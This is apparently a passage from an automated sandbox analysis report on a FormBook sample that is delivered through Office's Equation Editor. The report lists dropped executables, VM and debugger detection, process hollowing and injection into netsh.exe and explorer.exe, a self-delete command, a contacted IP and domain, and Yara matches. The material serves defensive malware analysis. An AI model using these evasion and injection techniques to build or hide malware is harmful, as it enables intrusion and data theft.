Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009B85C push eax; ret 8_2_0009B862
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009C932 pushfd ; ret 8_2_0009C933
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00096235 push 1D9B51BBh; retf 8_2_0009623A
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009525A pushfd ; ret 8_2_0009525B
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00095C87 push cs; iretd 8_2_00095C88
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0008AEB2 push ebp; retf 8_2_0008AEBC
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009B7A5 push eax; ret 8_2_0009B7F8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009B7FB push eax; ret 8_2_0009B862
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_0009B7F2 push eax; ret 8_2_0009B7F8

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Users\Public\vbc.exe File created: C:\Users\user\AppData\Local\Temp\nsf86CE.tmp\dulsmde.dll Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\Users\Public\vbc.exe Code function: 4_2_10008836 RtlEncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 4_2_10008836
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\netsh.exe RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2724 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe TID: 2628 Thread sleep time: -30000s >= -30000s Jump to behavior
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088C0 rdtsc 5_2_004088C0
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Code function: 4_2_00405E93 FindFirstFileA,FindClose, 4_2_00405E93
Source: C:\Users\Public\vbc.exe Code function: 4_2_004054BD DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA, 4_2_004054BD
Source: C:\Users\Public\vbc.exe Code function: 4_2_00402671 FindFirstFileA, 4_2_00402671
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.506645799.0000000008374000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000006.00000000.512518257.000000000457A000.00000004.00000001.sdmp Binary or memory string: ort\0000pciide\idechannel\5&12368b4a&0&7ide\cdromnecvmwar_vmware_sata_cd01_______________'
Source: explorer.exe, 00000006.00000000.512518257.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: vbc.exe, 00000004.00000002.493761978.00000000005C4000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.521416523.00000000044E7000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0Co>
Source: explorer.exe, 00000006.00000000.508758981.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: vbc.exe, 00000004.00000002.493761978.00000000005C4000.00000004.00000020.sdmp Binary or memory string: ^ECVMWar_VMware
Source: explorer.exe, 00000006.00000000.505152521.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}

Anti Debugging:

barindex
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Users\Public\vbc.exe Code function: 4_2_1000CDB2 IsDebuggerPresent, 4_2_1000CDB2
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Source: C:\Users\Public\vbc.exe Code function: 4_2_100093F8 EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer, 4_2_100093F8
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Source: C:\Users\Public\vbc.exe Code function: 4_2_100098C2 GetProcessHeap, 4_2_100098C2
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 5_2_004088C0 rdtsc 5_2_004088C0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001A402 mov eax, dword ptr fs:[00000030h] 4_2_1001A402
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001A616 mov eax, dword ptr fs:[00000030h] 4_2_1001A616
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001A6C7 mov eax, dword ptr fs:[00000030h] 4_2_1001A6C7
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001A706 mov eax, dword ptr fs:[00000030h] 4_2_1001A706
Source: C:\Users\Public\vbc.exe Code function: 4_2_1001A744 mov eax, dword ptr fs:[00000030h] 4_2_1001A744
Source: C:\Users\Public\vbc.exe Code function: 5_2_009226F8 mov eax, dword ptr fs:[00000030h] 5_2_009226F8
Source: C:\Windows\SysWOW64\netsh.exe Code function: 8_2_00C826F8 mov eax, dword ptr fs:[00000030h] 8_2_00C826F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 5_2_00409B30 LdrLoadDll, 5_2_00409B30
Source: C:\Users\Public\vbc.exe Code function: 4_2_10009B60 SetUnhandledExceptionFilter,UnhandledExceptionFilter, 4_2_10009B60

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 3.64.163.50 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.washingtonboatrentals.com
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\netsh.exe base address: 1640000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\netsh.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\SysWOW64\netsh.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.539064955.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000006.00000000.516537813.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Contains functionality to query CPU information (cpuid)
Source: C:\Users\Public\vbc.exe Code function: 4_2_100098DF cpuid 4_2_100098DF
Source: C:\Users\Public\vbc.exe Code function: 4_2_10012E10 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 4_2_10012E10
Source: C:\Users\Public\vbc.exe Code function: 4_2_004030FB EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess, 4_2_004030FB

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\netsh.exe C:\Windows\SysWOW64\netsh.exe

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 00000008.00000002.697947104.0000000000250000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.524713995.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556070673.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000001.493342652.0000000000400000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.697814931.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.495823503.0000000003030000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556229613.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.698011641.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.515415135.00000000097BD000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.556257297.0000000000430000.00000040.00020000.sdmp, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs